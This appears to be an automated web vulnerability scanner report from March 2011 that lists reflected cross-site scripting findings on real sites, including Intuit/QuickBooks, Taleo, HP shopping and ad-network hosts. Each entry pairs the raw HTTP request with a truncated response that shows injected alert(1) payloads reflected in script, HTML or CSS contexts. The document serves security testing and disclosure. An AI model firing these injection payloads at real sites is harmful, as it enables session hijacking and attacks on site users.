GET /s7d2.scene7.com/is/image Host: hpshopping.speedera.net Proxy-Connection: keep-alive Referer: http://www.shopping.hp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 77 Pragma: no-cache Cache-Control: no-cache, no-store Expires: Mon, 21 Mar 2011 15:50:13 GMT Date: Mon, 21 Mar 2011 15:50:13 GMT Connection: close Unable to find /HPShopping/scp_dt64f7e<img src=a onerror=alert(1) |
Severity: | High |
Confidence: | Certain |
Host: | http://ib.adnxs.com |
Path: | /ptj |
GET /ptj?member=311&inv_code Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.highbeam.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: icu=ChEI2AkQChgBIAEo |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Tue, 22-Mar-2011 16:45:13 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4470455573253905340 Set-Cookie: icu=ChIIlIUBEAoYASAB Set-Cookie: acb680754=5_[r^208WM'3_d6 Set-Cookie: uuid2=4470455573253905340 Set-Cookie: anj=Kfw)nByG2Z*cOUsSbu:)P Content-Type: text/javascript Date: Mon, 21 Mar 2011 16:45:13 GMT Content-Length: 1150 document.write('<scr'+ ...[SNIP]... ;btg=bk.rdst2;btg=qc.a ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://icfi.taleo.net |
Path: | /careersection/caree |
POST /careersection/caree Host: icfi.taleo.net Connection: keep-alive Referer: https://icfi.taleo.net Cache-Control: max-age=0 Origin: https://icfi.taleo.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=00A3A9C57 Content-Length: 18649 dialogTemplate-dialo ...[SNIP]... fqxQkIV0LtX6E84kSWAv ...[SNIP]... |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:33:54 GMT Server: Taleo Web Server 7 Vary: Accept-Encoding P3P: CP="CAO PSA OUR" Cache-Control: private Set-Cookie: JSESSIONID=00A3A9C57 Content-Language: en Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html;charset=UTF-8 Content-Length: 72265 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html lang="en"><head title="Privacy Agreement" profile ...[SNIP]... <input type='hidden' name='cshtstate' value='110040|67e09'><x style=x:expression(alert ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://icfi.taleo.net |
Path: | /careersection/caree |
POST /careersection/caree Host: icfi.taleo.net Connection: keep-alive Referer: https://icfi.taleo.net Cache-Control: max-age=0 Origin: https://icfi.taleo.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=00A3A9C57 Content-Length: 18649 dialogTemplate-dialo ...[SNIP]... EWXKNwXpSvau%2BKHZ8r ...[SNIP]... |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:33:49 GMT Server: Taleo Web Server 7 Vary: Accept-Encoding P3P: CP="CAO PSA OUR" Cache-Control: private Set-Cookie: JSESSIONID=00A3A9C57 Content-Language: en Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html;charset=UTF-8 Content-Length: 72265 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html lang="en"><head title="Privacy Agreement" profile ...[SNIP]... D2iLiCQ6bE9MQSRoWsAE ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://icfi.taleo.net |
Path: | /careersection/icf_prof |
POST /careersection/icf_prof Host: icfi.taleo.net Connection: keep-alive Referer: https://icfi.taleo.net Origin: https://icfi.taleo.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Content-Type: application/x-www-form Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Content-Length: 17820 ftlpageid=reqListBas ...[SNIP]... he previous page&actDisplayRefer ...[SNIP]... |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:34:32 GMT Server: Taleo Web Server 7 Vary: Accept-Encoding P3P: CP="CAO PSA OUR" Cache-Control: private Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html;charset=UTF-8 Content-Length: 22180 ftlx1!|!requisition ...[SNIP]... dd this position to the job cart: Field Interviewer / Kentucky!|!61220!|!false! ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://icfi.taleo.net |
Path: | /careersection/icf_prof |
POST /careersection/icf_prof Host: icfi.taleo.net Connection: keep-alive Referer: https://icfi.taleo.net Origin: https://icfi.taleo.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Content-Type: application/x-www-form Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Content-Length: 17820 ftlpageid=reqListBas ...[SNIP]... rawer.state=false ...[SNIP]... |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:34:31 GMT Server: Taleo Web Server 7 Vary: Accept-Encoding P3P: CP="CAO PSA OUR" Cache-Control: private Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html;charset=UTF-8 Content-Length: 22207 ftlx1!|!requisition ...[SNIP]... iewer / Kentucky - (Job Number: 1100000641)!|!false!| ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://icfi.taleo.net |
Path: | /careersection/icf_prof |
POST /careersection/icf_prof Host: icfi.taleo.net Connection: keep-alive Referer: https://icfi.taleo.net Origin: https://icfi.taleo.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Content-Type: application/x-www-form Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Content-Length: 17820 ftlpageid=reqListBas ...[SNIP]... anizations.count=1 ...[SNIP]... |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:34:30 GMT Server: Taleo Web Server 7 Vary: Accept-Encoding P3P: CP="CAO PSA OUR" Cache-Control: private Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html;charset=UTF-8 Content-Length: 22180 ftlx1!|!requisition ...[SNIP]... 41)!|!false!|!true!|!Add to My Job Cart!|!Add this position to the job cart: Field Interviewer / Kentucky!|!61220!|!false! ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://icfi.taleo.net |
Path: | /careersection/icf_prof |
POST /careersection/icf_prof Host: icfi.taleo.net Connection: keep-alive Referer: https://icfi.taleo.net Origin: https://icfi.taleo.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Content-Type: application/x-www-form Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Content-Length: 17820 ftlpageid=reqListBas ...[SNIP]... |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:34:24 GMT Server: Taleo Web Server 7 Vary: Accept-Encoding P3P: CP="CAO PSA OUR" Cache-Control: private Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html;charset=UTF-8 Content-Length: 22179 ftlx1a1722;alert(1)/ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://icfi.taleo.net |
Path: | /careersection/icf_prof |
POST /careersection/icf_prof Host: icfi.taleo.net Connection: keep-alive Referer: https://icfi.taleo.net Origin: https://icfi.taleo.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Content-Type: application/x-www-form Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Content-Length: 17820 ftlpageid=reqListBas ...[SNIP]... |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:34:24 GMT Server: Taleo Web Server 7 Vary: Accept-Encoding P3P: CP="CAO PSA OUR" Cache-Control: private Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html;charset=UTF-8 Content-Length: 22180 ftlx1!|!requisition ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://icfi.taleo.net |
Path: | /careersection/icf_prof |
POST /careersection/icf_prof Host: icfi.taleo.net Connection: keep-alive Referer: https://icfi.taleo.net Origin: https://icfi.taleo.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Content-Type: application/x-www-form Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Content-Length: 17820 ftlpageid=reqListBas ...[SNIP]... |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:34:23 GMT Server: Taleo Web Server 7 Vary: Accept-Encoding P3P: CP="CAO PSA OUR" Cache-Control: private Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html;charset=UTF-8 Content-Length: 22180 ftlx1!|!requisition ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://icfi.taleo.net |
Path: | /careersection/icf_prof |
POST /careersection/icf_prof Host: icfi.taleo.net Connection: keep-alive Referer: https://icfi.taleo.net Origin: https://icfi.taleo.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Content-Type: application/x-www-form Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Content-Length: 17820 ftlpageid=reqListBas ...[SNIP]... cation&listEmptyIsAp ...[SNIP]... |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:34:27 GMT Server: Taleo Web Server 7 Vary: Accept-Encoding P3P: CP="CAO PSA OUR" Cache-Control: private Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html;charset=UTF-8 Content-Length: 9465 ftlx1!|!requisition ...[SNIP]... !listRequisition.isEmpty! ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://icfi.taleo.net |
Path: | /careersection/icf_prof |
POST /careersection/icf_prof Host: icfi.taleo.net Connection: keep-alive Referer: https://icfi.taleo.net Origin: https://icfi.taleo.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Content-Type: application/x-www-form Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Content-Length: 17820 ftlpageid=reqListBas ...[SNIP]... eed creation: Location&listEmptyIs ...[SNIP]... |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:34:25 GMT Server: Taleo Web Server 7 Vary: Accept-Encoding P3P: CP="CAO PSA OUR" Cache-Control: private Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html;charset=UTF-8 Content-Length: 22180 ftlx1!|!requisition ...[SNIP]... t: Field Interviewer / Kentucky!|!61220!|!false! ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://icfi.taleo.net |
Path: | /careersection/icf_prof |
POST /careersection/icf_prof Host: icfi.taleo.net Connection: keep-alive Referer: https://icfi.taleo.net Cache-Control: max-age=0 Origin: https://icfi.taleo.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Content-Length: 20861 lang=en&ftlpageid ...[SNIP]... ed+creation%3A+Location ...[SNIP]... |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:35:52 GMT Server: Taleo Web Server 7 Vary: Accept-Encoding P3P: CP="CAO PSA OUR" Cache-Control: private Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html;charset=UTF-8 Content-Length: 166657 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <img src="/careersection ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://icfi.taleo.net |
Path: | /careersection/icf_prof |
POST /careersection/icf_prof Host: icfi.taleo.net Connection: keep-alive Referer: https://icfi.taleo.net Cache-Control: max-age=0 Origin: https://icfi.taleo.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Content-Length: 19242 lang=en&ftlpageid ...[SNIP]... o+to+the+previous+page ...[SNIP]... |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:36:16 GMT Server: Taleo Web Server 7 Vary: Accept-Encoding Set-Cookie: JSESSIONID=2C02529ED Content-Language: en Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html;charset=UTF-8 Content-Length: 70543 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html lang="en"><head title="Privacy Agreement" profile ...[SNIP]... <input type='hidden' name='cshtstate' value='110040|dbe02'><x style=x:expression(alert ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://icfi.taleo.net |
Path: | /careersection/icf_prof |
POST /careersection/icf_prof Host: icfi.taleo.net Connection: keep-alive Referer: https://icfi.taleo.net Cache-Control: max-age=0 Origin: https://icfi.taleo.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Content-Length: 19242 lang=en&ftlpageid ...[SNIP]... EWXKNwXpSvau%2BKHZ8r ...[SNIP]... |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:35:59 GMT Server: Taleo Web Server 7 Vary: Accept-Encoding Set-Cookie: JSESSIONID=93B95D4F3 Content-Language: en Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html;charset=UTF-8 Content-Length: 70543 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html lang="en"><head title="Privacy Agreement" profile ...[SNIP]... D2iLiCQ6bE9MQSRoWsAE ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://k.collective-media |
Path: | /cmadj/cm.womensforum/ |
GET /cmadj/cm.womensforum39b71'-alert(1)- Host: k.collective-media.net Proxy-Connection: keep-alive Referer: http://www.highbeam.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2 |
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Date: Mon, 21 Mar 2011 16:42:22 GMT Connection: close Set-Cookie: apnx=1; domain=collective-media Set-Cookie: qcms=1; domain=collective-media Set-Cookie: blue=1; domain=collective-media Set-Cookie: qcdp=1; domain=collective-media Content-Length: 9535 function cmIV_(){var a=this;this.ts=null;this ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://login.quickbooks |
Path: | /j/qbn/auth/employee |
GET /j/qbn/auth727a9<script>alert(1)< Host: login.quickbooks.com Connection: keep-alive Referer: http://www.infocustech User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:18:32 GMT Server: Web Server Content-Length: 80 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain Unknown page /ctol/j/qbn/auth727a9<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://mbox.offermatica |
Path: | /m2/intuit/mbox/standard |
GET /m2/intuit/mbox/standard Host: mbox.offermatica.intuit Proxy-Connection: keep-alive Referer: http://quickbooks.intuit User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: INTUIT_SESSIONID |
HTTP/1.1 200 OK Content-Type: text/javascript Content-Length: 216 Date: Mon, 21 Mar 2011 16:20:15 GMT Server: Test & Target mboxFactories.get( |
Severity: | High |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /apply-now/check-warranty |
GET /apply-now/check-warranty Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:02:30 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID=um X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95E2A450A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 161486 ...[SNIP]... cked',true); } if(selectedServiceIn { //$("#selected_check } } //var bas = 'card5917f alert(1)//0f2714cf68b'; //var parameterString1= //invokeAJAX(paramet } function processResponse(respo ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /apply-now/check-warranty |
GET /apply-now/check-warranty Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:02:23 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95E11310A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 161643 ...[SNIP]... <input type="radio" id="is_existing_merchant ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /apply-now/check-warranty |
GET /apply-now/check-warranty Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:00:24 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95C3E8D0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 161658 ...[SNIP]... <input type="radio" id="in_quickbooks_true" name="process_payment ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /apply-now/check-warranty |
GET /apply-now/check-warranty Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:00:14 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95C195D0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 161460 ...[SNIP]... tedHardwareId); var bas; if(initialSelectedSo { bas = initialSelectedSolution; } if(UAenv == null) { UAenv = 'prod100cc';alert(1)/ } if(UAenv == "null" || UAenv == null) { UAenv = "prod"; } var return_url = 'http://payments.intuit ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /apply-now/check-warranty |
GET /apply-now/check-warranty Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:59:50 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95BBAA80A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 161460 ...[SNIP]... var ua_selected_add_on var ua_available_add_on var ua_selected_hardware_ids; var ua_selected_hardware_own var ua_selected_card_service var UAenv = "prodc5165";alert(1)/ var mandatory_card_name; var mandatory_card_id; var selectedCardMap; var records; $(document).ready { requestType = 'rtnFromUA'; bas = 'card'; sbweb.util.log. ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://quickbooks.intuit |
Path: | / |
GET /?34696"-alert(1)- Host: quickbooks.intuit.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:19:24 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: abTestId=null; Domain=.intuit.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: abTestGroup=null; Domain=.intuit.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: abTestPriorityCode=null; Domain=.intuit.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: originalABTestPriori Set-Cookie: splitABTestPriorityCode Set-Cookie: userSegmentation=null; Domain=.quickbooks.intuit Set-Cookie: abTestId=00000000000 Set-Cookie: abTestGroup=T9; Domain=.intuit.com; Expires=Thu, 18-Mar-2021 16:19:24 GMT; Path=/ Set-Cookie: abTestPriorityCode Set-Cookie: priorityCode=0273400000; Domain=quickbooks.intuit Set-Cookie: Sgmt=default; Domain=quickbooks.intuit x-wily-info: Clear guid=D936B3520A08059 x-wily-servlet: Clear appServerIp= Vary: Accept-Encoding Content-Type: text/html;charset=ISO Content-Length: 78963 ...[SNIP]... <script type="text/javascript"> mboxCreate("qb_category </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://quickbooks.intuit |
Path: | /point-of-sale-system/ |
GET /point-of-sale-system/?c95b7"-alert(1)- Host: quickbooks.intuit.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:21:34 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=quickbooks.intuit Set-Cookie: Sgmt=default; Domain=quickbooks.intuit x-wily-info: Clear guid=D938AFDF0A08058 x-wily-servlet: Clear appServerIp= Vary: Accept-Encoding Content-Type: text/html;charset=ISO Content-Length: 64447 ...[SNIP]... <script type="text/javascript"> mboxCreate("qb_category </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://quickbooks.intuit |
Path: | /pro/ |
GET /pro/?48c14"-alert(1)- Host: quickbooks.intuit.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: INTUIT_SESSIONID |
